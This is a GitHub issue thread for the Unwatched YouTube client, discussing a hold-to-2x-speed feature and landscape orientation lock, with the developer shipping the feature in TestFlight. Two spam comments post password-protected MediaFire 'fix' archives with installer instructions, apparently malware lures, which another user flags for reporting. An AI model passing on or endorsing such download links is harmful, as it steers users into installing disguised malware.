### ISSUE TITLE
Support Hold to 2x speed and Landscape lock

### ISSUE THREAD

**Issue by bbb651** [fer0n/Unwatched#5]
Thanks for making this incredible app! I’ve tried many youtube clients from UnTraped, to Yattee, to uYou++ (until SideStore broke and expired on me) and Unwatched was by far the best experience.

Youtube has a feature where you can hold down on the video to temporarily override the speed to 2x. It would be nice to support it, Ryu has [this](https://github.com/cranci1/Ryu/blob/main/Ryu/Utils/Player/NormalPlayer.swift) implementation of it. Now that I think about it the player is in a webview since it’s an embed right? Iirc it’s still possible to modify the player but it might be different (Ryu also has some code for it with an experimental webview based player).

The other thing I miss from Ryu and Outplayer is prefer landscape, it’s especially annoying with AVPlayer because unlike YouTube’s official app, orientation lock doesn’t lock the video to current orientation but forces the orientation, and iOS desperately lacks smarter orientation detection, so you cannot lie down on the wrong side without the video getting rotated. This should be pretty simple as there’s an api for it, although it should detect shorts and avoid doing that or lock the orientation the other way.

**Comment by fer0n** [comment]
Interesting idea, does YouTube have this if you just hold anywhere in the video? And it only works in the app?
I haven't yet found a way to detect any interaction that is happening on the video, perhaps it's just not possible due to the iframe. I do, however, have a play button overlayed in the centre which I could hijack for this, but it probably makes more sense to hold down on the playback speed from the fullscreen controls (the one that shows up if you rotate the screen to enter fullscreen and then pause or tap on the side).

If you tap the arrow on the right of the playback speed in portrait, you can rotate the screen. There's also a "rotate on play" option in settings in the most recent TestFlight (you can [join here](https://testflight.apple.com/join/9RP0WzCR)). It just rotates the ui and doesn't lock it in though.

Is the rotate triggered when tapping play or when the video is initially selected? I'm not sure if the rotate on play makes the most sense yet.

**Comment by bbb651** [comment]
Yes in the youtube app it triggers when you hold anywhere, and on web (on desktop at least) it triggers when you hold down <kbd>space</kbd>. This actually also works on youtube on safari while you're not in fullscreened, but not in Unwatched (probably because of the MacOS user agent). Hijacking the play button wouldn't really help because it's a toggle not a hold, on iOS 16+ there is already a playback speed dropdown in the player itself.

The rotate button works pretty well, it doesn't try to rotate again until you unrotate and rerotate the phone to the orientation. I tried the beta, I find "rotate on play" a bit weird, I thing borrowing the behaviour from the youtube app here as well would be nice, there fullscreen is always horizontal and it has a gesture where you swipe up on the video to rotate + fullscreen it. Also "rotate on play" is a bit buggy for me, sometimes when I press play it rotates but doesn't enter fullscreen, so I'm left with the video playing offscreen and ui switches to a horizontal mode where I can only see the menu (queue, inbox, library). Took me a while to figure out there is a `x` button at the top, I first tried to swipe down from the header like I would in the vertical mode. Also the controls on the edge when you are in the horizontal non-fullscreen youtube embed view are neat, although the youtube video overlay never clears from the embed..

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bbb651** [comment]
@fer0n can you report him and delete the comment? Apparently they are getting pretty common, coincidentally I just got a notification for a workflow notification for a comment I made in Zed by a workflow that checks for these https://github.com/zed-industries/zed/commit/a87076e815e718e94ea76860e51c27db3dd750b3

**Comment by fer0n** [comment]
I have a custom shortcut for `space` for play/pause, perhaps that's blocking it. I was talking about using the overlay play button as a touch area (you can see it flashing when you tap the center of the video to play/pause), but that doesn't make much sense anyways. 

I'll consider adding the 2x speed while holding space/the playback speed overlay to the list, not sure when I'll get to it though.

Any gesture on the iframe player that lacks the "touch up" leads to the player ui being stuck. You can long press the play button and choose "reload player" to fix this. I considered the swipe up gesture, opening it would work, but after closing it there's a good chance the player ui would be stuck. I'll stick with the buttons for now.

I'll see if I can fix the menu still being open, do you have "Hide menu on play" enabled? Swipe down doesn't work on iPhone landscape, as the sheet automatically turns into a fullscreen cover.

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by fer0n** [comment]
@bbb651 the temporary 2x playback speed is now in the most [recent TestFlight version](https://testflight.apple.com/join/9RP0WzCR). You can hold down on the speed in the controls on the side of the horizontal player to temporarily speed it up.

**Comment by fer0n** [comment]
@bbb651 there's a dedicated button that you can toggle on iPad in the most recent TestFlight. It also switches between speeding up to 2x and slowing down to 1x depending on your current playback speed (>= 1.5x means it slows down instead). Keyboard shortcut is "s" for this.
